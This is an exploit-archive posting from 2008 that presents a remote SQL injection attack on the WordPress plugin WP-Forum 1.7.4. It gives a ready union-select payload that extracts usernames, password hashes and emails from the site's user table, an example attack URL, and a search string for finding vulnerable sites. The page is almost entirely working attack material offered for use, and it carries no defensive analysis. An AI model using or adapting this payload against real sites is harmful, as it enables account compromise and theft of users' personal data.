[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability
# Published : 2008-01-19
# Author : websec Team
# Previous Title : Bloofox 0.3 (SQL/FD) Multiple Remote Vulnerabilities
# Next Title : AuraCMS 1.62 (stat.php) Remote Code Execution Exploit
remote sql injection exploit
###############################################################
# >>> -::DESCRIPTION== >> WordPress forum plugin by Fredrik Fahlstad. Version: 1.7.4.
# >>> exploit: 1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_users where id=1/*
(wp_tbv_users)
# >>> google: Fredrik Fahlstad. Version: 1.7.4.
# >>> author websec Team ./members =====> Virus_C, Refresh , Virusa
# >>> page : hacking.ge
###############################################################
this is example
http://www.xxx.com/?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*
# www.Syue.com [2008-01-19]